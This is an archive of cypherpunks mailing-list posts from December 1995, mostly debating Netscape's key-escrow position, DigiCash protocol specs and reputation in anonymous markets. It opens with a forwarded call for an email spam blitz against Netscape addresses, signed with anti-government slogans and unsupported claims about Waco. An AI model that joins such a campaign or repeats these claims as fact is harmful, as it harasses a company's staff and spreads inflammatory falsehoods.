> (2) SPAM NETSCAPE
> 
> Here's where the EMAIL BLITZ should go (extra points for creativity):
> 
> info@netscape.com 
>      General information 
> 
> admgr@netscape.com 
>      Netscape site advertising sales 
> 
> x_cbug@netscape.com 
>      Bug reports from X Window users 
> 
> win_cbug@netscape.com 
>      Bug reports from Windows users 
> 
> mac_cbug@netscape.com 
>      Bug reports from Macintosh users 
> 
> hr@netscape.com 
>      Netscape Human Resources department 
> 
> training@netscape.com 
>      Netscape Training programs information 
> 
> admgr@netscape.com 
>      Netscape site advertising sales and Sponsor program information 
> 
> proprietor@netscape.com 
>      Netscape electronic store feedback 
> 
> editor@netscape.com 
>      Feedback about Netscape's Net site 
> 
> ssl-talk-request@netscape.com 
>      E-mail list for Secure Sockets Layer protocol discussion 
> 
> standards@netscape.com 
>      Questions about Netscape's open-standards activities 
> 
> nswinapi-talk-request@netscape.com 
>      E-mail list for users of the Windows Netscape Server API 
> CORPORATE HEADQUARTERS 
> 
> -------------------------------------------------------------
> 
> NETSCAPE COMMUNICATIONS CORPORATION 
>      501 E. Middlefield Rd.
>      Mountain View, CA 94043
>      415/528-2555 Product and sales information (7:00 a.m. to 5:00 p.m. PST)
>      415/254-1900 Executive offices
>      415/528-4124 Fax
>      http://www.netscape.com 
> 
> ATLANTA 
>      Netscape Communications Corporation
>      1850 Parkway Pl.
>      Suite 420
>      Marietta, GA 30067
> 
> CHICAGO 
>      Netscape Communications Corporation
>      2159 N. Seminary
>      Chicago, IL 60614
> 
> DALLAS 
>      Netscape Communications Corporation
>      17304 North Preston Road
>      Suite 800
>      Dallas, Texas 75252
> 
> NEW YORK 
>      Netscape Communications Corporation
>      599 Lexington Ave.
>      Suite 2300
>      New York, NY 10022
> 
> NORTHWEST 
>      Netscape Communications Corporation
>      501 Middlefield Rd.
>      Mountain View, CA 94043
> 
> SOUTHWEST 
>      Netscape Communications Corporation
>      111 N. Sepulveda Blvd.
>      Manhattan Beach, CA 90266
> 
> WASHINGTON, D.C. 
>      Netscape Communications Corporation
>      6701 Democracy Blvd.
>      Suite 300
>      Bethesda, MD 20817
> 
> THANKS AND A HAT TIP TO HELEN AT E.PLURIBUS  FOR GETTING ALL THE
> ADDRESSES!!!!!!!!
> Kind regards,
> 
> ***********************  V  *************************
>           DEATH TO THE NEW WORLD ORDER
> ****************************************************
> 
> Linda Thompson
> American Justice Federation
> Home of AEN News & news videos, "Waco, the Big Lie,"  "America Under Siege"
> 3850 S. Emerson Ave.
> Indianapolis, IN 46203
> Telephone:  (317) 780-5200
> Fax:  (317) 780-5209
> Internet:  lindat@iquest.net
> 
> **************************************************
>    Remember Waco.  The Murderers are still free.
> ***************************************************
> 
> The Army is going to court-martial Spc. Michael New 
> for not wearing a U.N. uniform, but the Army won't
> court-martial the members of the 160th and 158th
> Special Operations, 82nd Airborne, Ft. Hood Cav
> Members, and 10th Mountain Division members 
> who helped MURDER CHILDREN at Waco.
> 
> What's wrong with this picture?
> 
> 
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Sun, 3 Dec 1995 12:08:28 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199512030330.UAA22240@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>That's today's method, more or less.  It doesn't address my needs.  The
>name you pick for your key may or may not mean anything to me.  It might be
>pronounceable, giving it some advantage over a radix-64 string, but it
>might also be non-unique, making it worthless as an identifier.
>
>What means something to me is whatever name (or symbol) I assign to the
>person behind the key in question.  That's the one in my mind and therefore
>the only one of interest to me.  You, however, don't know what's in my
>mind.  You don't even know my preferred symbol set.
>

Why not give it two names?  A local name that could be an icon or something,
and a universal name (i.e. MD5 hash of key).

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----
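
The two-name scheme suggested in the message above, as an added example that is not part of the original post: the universal name is a hash of the key bytes (MD5, as the post proposes, with the algorithm left as a parameter), and the local name is whatever the key ring's owner assigns. The class name, method names and key bytes are hypothetical and constructed for illustration.

```python
import hashlib


class PetnameRing:
    """Key ring with two names per key: a universal name derived from the
    key itself, and a local name chosen by the owner of this ring."""

    def __init__(self, algorithm="md5"):
        # "md5" follows the post; any hashlib algorithm name can be passed.
        self.algorithm = algorithm
        self._keys = {}     # universal name -> (key bytes, name the key claims)
        self._local = {}    # local name -> universal name
        self._by_uid = {}   # universal name -> local name

    def universal_name(self, key_bytes):
        """Hash of the key material: the same for everyone who holds the key."""
        return hashlib.new(self.algorithm, key_bytes).hexdigest()

    def add_key(self, key_bytes, claimed_name):
        """Store a key. The name it claims is kept only as an untrusted hint."""
        uid = self.universal_name(key_bytes)
        self._keys[uid] = (key_bytes, claimed_name)
        return uid

    def assign_local(self, uid, local_name):
        """Bind a local name to a key; a local name may point at one key only."""
        if uid not in self._keys:
            raise KeyError("unknown key: " + uid)
        owner = self._local.get(local_name)
        if owner is not None and owner != uid:
            raise ValueError("local name already bound to " + owner)
        old = self._by_uid.pop(uid, None)
        if old is not None:
            del self._local[old]
        self._local[local_name] = uid
        self._by_uid[uid] = local_name

    def resolve(self, local_name):
        """Local name -> universal name."""
        return self._local[local_name]

    def display(self, uid):
        """What to show the user: the local name if one was assigned,
        otherwise a marker that makes the self-chosen name look untrusted."""
        local = self._by_uid.get(uid)
        if local is not None:
            return local
        claimed = self._keys[uid][1]
        return "UNNAMED %s (claims %r)" % (uid[:8], claimed)


def demo():
    """Two constructed keys that both claim the name 'Alice'."""
    ring = PetnameRing()
    first = ring.add_key(b"constructed-key-material-1", "Alice")
    second = ring.add_key(b"constructed-key-material-2", "Alice")
    ring.assign_local(first, "alice-from-work")
    try:
        ring.assign_local(second, "alice-from-work")
        clash_rejected = False
    except ValueError:
        clash_rejected = True
    return ring, first, second, clash_rejected


if __name__ == "__main__":
    ring, first, second, clash_rejected = demo()
    print(first, "->", ring.display(first))
    print(second, "->", ring.display(second))
    print("duplicate local name rejected:", clash_rejected)
```

The name a key claims for itself never becomes an identifier: two keys claiming "Alice" get different universal names, and only the first holds the local name the ring's owner assigned.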





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 3 Dec 1995 02:51:42 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace64c8e0402100421f3@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


The Netscape browser chose the wrong time, this morning, to tell me that my
demo copy was about to expire.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 3 Dec 1995 00:03:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: DigiCash releases protocol specs!
Message-ID: <199512021557.KAA21782@homeport.org>
MIME-Version: 1.0
Content-Type: text



| By popular request, DigiCash is releasing the protocol specs.
|
| The specs are available at 
| http://www.digicash.com/ecash/protocol.html
|
| Please be aware that the document is work in progress. More 
| specifications, including byte level descriptions of the message 
| format will be added throughout the weekend.

	And of course, you'll be including a description of how you
generate random numbers for use in keys and blindings?  I ask only
because I didn't see a place for it on the Digicash site.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Sun, 3 Dec 1995 01:07:39 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography MPLS Book Release
Message-ID: <m0tLvGD-0004vjC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



Did I mention that Bruce Schneier and Ms. Cooper are charming hosts
with an excellent caterer? Probably not, with all the Netscape/GAK
hoo-hah going on. 

Well, if you'll excuse me for posting thanks a couple of days late,
thanks for an excellent time. It was good to see some of the local
folks in person again.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 1995 01:48:03 +0800
To: cypherpunks@toad.com
Subject: Why Netscape employees should not leave...
Message-ID: <ace5cd0216021004c8fd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:33 AM 12/2/95, sameer wrote:
>>
>> So, for a 15% reduction in salary and 30 days of job search, is it worth it?
>
>        30 days? in silicon valley? you *must* be joking. (i suppose
>the market for good net-folks isn't as big over on the right coast.)

Just a minor clarification. I don't speak for any of the Netscape employees
here (nor am I encouraging them to leave...they can do *more* within
Netscape than merely by resigning in some sort of protest).

The _salary_ figure is not the key issue. Stock options are. Their stock
options were almost certainly priced before the big run-up in price these
last few months, and most likely priced at the IPO price or even lower. It
is quite likely that these stock options are worth far, far more than
salary.

True, other companies offer stock options, but their Netscape options are
already "in the money" by a wide margin, which is an incredible incentive
to stick around.

I'm critical of Netscape, like others are, on various issues. But I sure do
hope we never turn this criticism into suggestions that Jeff and the other
Netscape folks here should quit in protest. That smacks too much of "you're
working for the war machine!" stridency. (Next we'll be having people dump
buckets of blood over piles of Netscape Navigator at Fry's.)

I read the Jim Clark statement that Jeff forwarded. It seemed noncommittal
on the actual issue of whether Netscape will build a U.S.-supported GAK (as
opposed to offering GAK for the Iraqis or French). I await with interest
the clarification of the anti-GAK stance that Jeff alluded to.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 3 Dec 1995 03:33:24 +0800
To: cypherpunks@toad.com
Subject: Netscape GAK page.
Message-ID: <ace657a40802100417e5@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have gone back and improved the "Netscape GAK?" page based on a good
night's sleep and some helpful suggestions (thank you all who mailed me
about the page). I would appreciate feedback on the page, especially from
Netscape or its employees (in an official or unofficial capacity). I have
tried to be even handed in my presentation of the information, while not
hiding the fact that I strongly disagree with the stance that Netscape has
taken.

<http://www.obscura.com/~loki/GAK.html>

        -Lance



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 04:03:22 +0800
To: unicorn@polaris.mindport.net (Black Unicorn)
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202140203.1199A-100000@polaris.mindport.net>
Message-ID: <199512021936.LAA09776@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> With which firm?  Or have you made it an in-house effort?
> 

	There was no Netscape (or RSADSI, for that matter [an RSADSI
employee showed up, but it was on his own time]) representative at the
recent Bernstein hearing in SF. I think that shows how much they
really care.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 01:11:21 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: FW: websurfer 4.6 (fwd)
Message-ID: <Pine.SUN.3.91.951202115438.2073D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


so much for compatibility....guess I'm sticking with netscape for now.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

---------- Forwarded message ----------
Date: Fri, 1 Dec 95 16:49:34 PST
From: Netmanage Technical Support <Support@netmanage.com>
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: FW: websurfer 4.6 


Hello,

Thank you for emailing NetManage Technical Support. WebSurfer 4.6 was
designed to work on Winsock 1.1 compliant systems. Since you are
running Winsock version 2.0 this may be the reason for the
application not working. We will report this to Engineering so
hopefully in a future release WebSurfer might be able to support
this new Winsock version.

Thank you for considering Chameleon WebSurfer,

Support@netmange.com
==
[earlier, I had said:]

won't start on my pentium 100 w/ 20Mb running qemm 7.04, windows 3.11, 
winsock 2.0 rev B on a novell 3.x LAN.

Netscape runs fine.

This might help:
Trumpet Winsock Version 2.0 Revision B
Copyright (c) 1993,1994 by Peter R. Tattam
All Rights Reserved.
THIS IS AN UNREGISTERED SHAREWARE VERSION FOR EVALUATION ONLY.
Ethernet address = 00:00:F4:D2:64:D3
WINPKT packet driver located on vector $66
IP buffers = 32
Performing bootp...Bootp successful
My IP = 129.171.188.92 netmask = 255.255.255.0 gateway = 129.171.188.1
Task WEBSURF(22E7) did not call WSACleanup.
Task WEBSURF(38EF) did not call WSACleanup.


-----------------End of Original Message-----------------

If responding to a previous message please include the original for our reference. To ensure a faster reply be sure to reply to 'support@netmanage.com' and not to individual sender of messages.

--         /\ 
**********/@@\ *********************************
          \__/      NetManage Inc.
       W   AA   W   Home of Chameleon TCPIP for Windows
       |__AYA__/    TCPIP Apps for Windows and NT
         AXXV          
         VXXV          
      W  VUV   W      Technical Support  (408)973-8181
      |_/ V \_/ __        Fax (408)973-8272 
           \   [_ \             
            \_____/    MIME enclosures are OK 
                              gopher server: gopher.netmanage.com
	             www:   http:/www.netmanage.com
                   
For a list of current NetManage products use WebSurfer and go to:     http://www.netmanage.com:80/netmanage/products/upgrade.html

Serendipity
11/20/95
10:36:42 AM

This message was sent by Chameleon 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 01:15:58 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: DigiCash releases protocol specs!
In-Reply-To: <9512012324.AA01808@ch1d157nwk>
Message-ID: <Pine.SUN.3.91.951202120534.2073G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Absolutely.  Now if I can just get Hal to translate these into English 
for me....

On Fri, 1 Dec 1995, Andrew Loewenstern wrote:

> >  By popular request, DigiCash is releasing the protocol specs.
> 
> Three cheers to DigiCash, Mark Twain, and Lucky!
> 
> andrew
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 3 Dec 1995 04:41:38 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512022024.MAA08119@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat 2 Dec 1995 05:24 one of the Alices wrote on the subject 
of Jim's comments about "bubbles" and such, and ended up automatically filtered to my Deleted folder (THAT will teach me to be curious about what ends up there!):

> The market seems to "think" that it's a better present judge 
> of what Netscape has than he does.  It's almost as though 
> the "market" has developed a "mind" of its own.  

Well, of course! Markets are the most efficient integration of the minds of the participants, hands down.

> It's own particular neural network.  

Exactly. Literally. And huge, too.

> It's almost as though there is automated software at work. 

There is: Wetware. Massive concurrent processing, heavy parallelism, inefficient I/O. Distributed, redundant memory. Inefficient but infinitely adaptable interprocessor routing. Capable of handling any degree of outage. All elements individually expendable. Self-replicating processors that have significant lead time but integrate smoothly into the net. Designs and builds its own outboard peripherals and interconnects. Best damned planetary computing system in this star system. But I diverge...

It's not always right (though self-fulfilling prophecy is often a big part of the equation), and it often misses the anomalies, but because it IS an integration is precisely why it may mean something different than you suggest.

It may in fact be the best barometer we have of the true depth of the exploding Internet phenomenon.  Completely aside from the question of whether or not the seeming Netscape overvaluation bubble bursts, etc., Netscape's share price more directly reflects the personal involvement and upward view of real people with respect to the Internet/WWW than anything else we have.

Remember, there are still naysayers out there, declaiming in places from books to columns to TV, while the reality is that computers are now outselling televisions, and a key new form of synergistic human communication is exploding in exponential growth.  Humans deal on a personal level only moderately well with linear processes, and poorly with geometric processes -- it's understandable that the growth of the Internet/WWW and the implications thereof would be late in being recognized and be incorrectly understood until sometime AFTER the changes have rocked the society.

Markets, though, more accurately reflect what people are actually doing, what they are willing to do, and what they think "in their gut" will happen.  While they also reflect what people might LIKE to happen, they reflect, too, that what people WANT to happen, their desires often MAKE happen.  Capitalize ME to the tune of $5 billion, for instance, and I may be influential not only during the course of your life but the lives of your great-grandchildren.

Selling Netscape short may or may not be a wise move -- selling market processes short is usually a fool's exercise in self-delusion.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMCsBEjw99YhtpnhAQE04QH8C+jk59lxyAqkVlfhd2VLw3TJKnECdXXJ
fNE7S0QZyd5eqFnZ4wTyHeX18YfTg+xiFZPPfxpRCdgO/x2K8sxFWQ==
=/2cN
-----END PGP SIGNATURE-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Dec 1995 01:49:36 +0800
To: cypherpunks@toad.com
Subject: EXO_ner
Message-ID: <199512021734.MAA03028@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


SenXon and The Washrag blow today about which has the most to 
be ashamed of and hide from the filthy lingerie leering 
republic.


EXO_ner  (sheer kb)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Dec 1995 05:33:05 +0800
To: cypherpunks@toad.com
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <199512022116.NAA11199@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to be so late picking up this thread, but I was very busy this past
week.

Wei Dai <weidai@eskimo.com> writes:
>Can you elaborate more on why the analysis is inadequate?  (I know it 
>probably isn't adequate, but why do you think so?)

"Reputation" is a fairly broad concept.  It generally refers to our
expectations of how some person will behave in various circumstances.  To
some extent, every character trait can have a reputation associated with
it.  A person can have a reputation for honesty, for efficiency, for
steadiness, for accuracy, and so on.  Even looking at it solely from the
point of view of a consumer choosing a service provider, any or all of
these traits might be important depending on the situation.  If I need
the work done right away, I will choose a supplier with a reputation for
speed.  If I want to be sure it is right and doesn't have to be redone, I
will choose one with a reputation for care and accuracy, and so on.

I don't think the notion of a graph showing utility (an overall summing
up of value to me) versus cost really captures this notion.  Such a graph
is useful and adequate for some forms of economic analysis where certain
simplifying assumptions are made, but I don't think it will work in this
case.  One of the big issues we would want to analyze is the impact of
various sets of rules and conventions for how trades occur.  The question
is how trust could be established, or how trade could occur in its
absence, given the possibility of avoiding retribution for dishonest
behavior that anonymous communication allows.  In this analysis we are
going to need more information than just utility vs price.  We will need
to separate out those various factors which go to make up the utility.

Changing the market conventions (say, by introducing escrow agencies)
will change the weightings of the various factors that make up
utility.  If I no longer have to trust the honesty of the person I am
trading with (because we have an escrow agency to help us make the
exchange) then the importance of his reputation for honesty goes down.
The result is that the "reputation" curves will change rather
dynamically and unpredictably as we consider different possible
structures in the market.  This will make the analysis of them
intractable, I would think.

As I wrote before, it makes more sense to me to focus explicitly on the
issue of trust and honesty, since those seem to be the main issues which
are going to take on more importance in an anonymous market.  Yes, they
are important in already existing markets, too, and there are plenty of
fly by night, hole in the wall companies which exist solely to do
business dishonestly and then evade retribution.  But the ease of doing
these things could increase in an anonymous market.

The other fact that makes trustworthiness more important in such a
market is the cost it applies.  One of the potential benefits of
anonymity is privacy.  To establish trust by keeping a steady pseudonym
(as was suggested earlier, a trade name or brand name performs this
function even as companies and personnel change out from under it)
means giving up a certain level of privacy.  Even if the trade name is
controlled pseudonymously, the linkability of its transactions
represents a form of exposure which can be seen as a cost.  If the only
way to be successful in business is to give up some of the privacy that
anonymity would provide by working through a consistent pseudonym, that
would be an interesting result.  Again, the issue is primarily one of
trustworthiness, as I see it.

I do think the idea of analyzing costs in terms of "throwing away your
reputation" by cheating and starting anew is an interesting approach.
The question is whether you can really quantify the value of a
reputation.  I know in business now corporations do carry on their books
something called "good will" which I believe is roughly the value of
their good name and trade marks.  However it is not normally considered
to be a major asset, I think.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 3 Dec 1995 02:58:10 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why Netscape employees should not leave...
Message-ID: <v02130502ace652b201d3@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Of course given the great market success of the other Clipper
products, I wouldn't be counting my stock options before they
hatch. Browsers are not that complicated. Nor are HTTP servers.
A US-only, truly secure system would be easy to build. SSL is
designed to be expanded to include new algorithms. It's pretty
good in that respect.

If I were considering launching a Clipperized Browser, I would
really consider the negative effect it would have on its
marketability and its stock price.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:19:04 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C016E6.6264@netscape.com>
Message-ID: <Pine.SUN.3.91.951202140203.1199A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
> > 
> > On Fri, 1 Dec 1995, Jeff Weinstein wrote:

> > >   See my recent message to this list.  We will be taking an anti-GAK
> > > position.
> > 
> > So you will refuse to implement GAK in future version of netscape then?
> > Or you will merely do lipservice to the GAK policies at the conference?
> > 
> > I think the distinction is quite key.
> 
>   If the law requires GAK, then I believe that we will implement it rather
> than just disable encryption.  We are taking a position against GAK and
> will continue to lobby against it.  We are planning to continue to do both
> US and Export versions, so I don't think that the government's ploy of
> trying to lure companies into weakening their domestic versions will work.

AT&T seems to have been suitably 'incentivized'.
The receipt of government funding (in whatever guise) might be just as 
powerful in this case.

To the outsider, it looks as if Netscape 'owes' the government.

> We released a 128-bit version of our product almost a year ago, at a
> time when many companies were providing only weak crypto in their domestic
> products so that they didn't have to trouble themselves with two versions.

And this is impressive.  Stamina, however, is much more difficult.

> We are actively lobbying in washington to get clarification of the
> current regulations so that we can provide the US version via an "export
> controlled" FTP or HTTP download.

With which firm?  Or have you made it an in-house effort?

> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:25:10 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <9512021318.AA27932@all.net>
Message-ID: <Pine.SUN.3.91.951202140947.1199C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Dr. Frederick B. Cohen wrote:

> The point Netscape seems to miss is that by refusing to go with weak
> crypto and having the best product on the market, Netscape may be able
> to force these governments into a position of accepting it.

[...]

> The right move for Netscape is to improve crypto-security, to refuse to
> give in to government, and to publicly vilify the people in government
> who stand in their way.  When billions of dollars are at stake and the
> blame is placed squarely on the shoulders of a politician trying to
> claim economic improvements based on their policies, the politician is
> likely to yield.


"Gee, I dunno, that sounds like a lot of work, and well, I'm making good 
dough.  Sure, it would be a boon for the company, and fit right in with 
the mainstream perception that government is way too involved in Joe 
Random's life, and win or lose, either way it would be a major public 
relations coup, and would restore the confidence of many foreign 
customers concerned about U.S. economic intelligence goals, but well... it 
just sounds so... subversive.

Honey, could you pass the jam?"

> 
> 
> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Sun, 3 Dec 1995 04:33:47 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512022022.OAA19354@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>> >Shouldn't be too hard to hack this into Apache.
>
>	Should my commercial release of Apache/SSL include this? ;-)
>(I could make it into a configuration option, so that if the
>User-Agent is Mozilla, it passes Back a Refresh: header with the
>response....)

Well, I think configurable redirects based on User-Agent would be a good
thing.  However, if you don't control the server being used you can still
use client pull to redirect on a page-by-page basis.  I've been made aware
of at least one non-Netscape browser that does client pulls, so checking the
User-Agent would be desirable, but (AFAIK) that isn't possible without
modifying the server, using cgi, or something along those lines.

I've got the perl script to automatically add (and remove) the meta-http lines
to individual pages more or less done, but I won't release it just yet
(if at all).  Jeff Weinstein's promise to make Netscape's GAK policy
publicly available is an important step in the right direction.  However,
whatever their policy statement ends up saying, it should be obvious that their
level of commitment to opposing GAK is minimal at best.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 3 Dec 1995 03:48:06 +0800
To: cypherpunks@toad.com
Subject: Cypher secure versus computationally unbounded adversary
Message-ID: <9512021931.AA01944@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

I've just come up with a method for implementing an encryption algorithm
that is absolutely secure from passive attacks by a computationally
unbounded adversary. Is this a new capability, or am I reinventing the
wheel here?

Thanks,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:50:09 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <ace5cd0216021004c8fd@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951202142227.1199D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Timothy C. May wrote:

> At 8:33 AM 12/2/95, sameer wrote:
> >>
> >> So, for a 15% reduction in salary and 30 days of job search, is it worth it?
> >
> >        30 days? in silicon valley? you *must* be joking. (i suppose
> >the market for good net-folks isn't as big over on the right coast.)
> 
> Just a minor clarification. I don't speak for any of the Netscape employees
> here (nor am I encouraging them to leave...they can do *more* within
> Netscape than merely be resigning in some sort of protest).

[...]

> I'm critical of Netscape, like others are, on various issues. But I sure do
> hope we never turn this criticism into suggestions that Jeff and the other
> Netscape folks here should quit in protest. That smacks too much of "you're
> working for the war machine!" stridency. (Next we'll be having people dump
> buckets of blood over piles of Netscape Navigator at Fry's.)

The point that should have come across was that it is hypocrisy for the 
Netscape employee to purport to be a strong crypto supporter of any great 
degree when the phrase 'the money is more important to me' could be applied.

I tend to agree that the resulting effect was instead a version of "if 
you're not a part of the solution, you're part of the problem."

I just get sick of those who tout themselves as Experts in Software 
Munitions and in fact are merely in it for the cash.  In it for the 
cash is just fine.  Just don't tell me later you aren't.

I don't care if Netscape makes a pile of money as of now.  Until they 
show themselves as a company with backbone in the area I consider 
important, my investment dollar goes elsewhere.

> 
> I read the Jim Clark statement that Jeff forwarded. It seemed noncommittal
> on the actual issue of whether Netscape will build a U.S.-supported GAK (as
> opposed to offering GAK for the Iraqis or French). I await with interest
> the clarification of the anti-GAK stance that Jeff alluded to.

I believe you got it with:

"If the law requires GAK, then I believe that we will implement it rather
than just disable encryption."

Note that the phrase is entirely ambiguous on whether this refers to the 
law requiring GAK for export, or export AND domestic sales.  Netscape 
will install GAK into whatever will increase its sales.  I understand 
and respect this position in the context of a company which needs 
badly to start raking in some profits.  

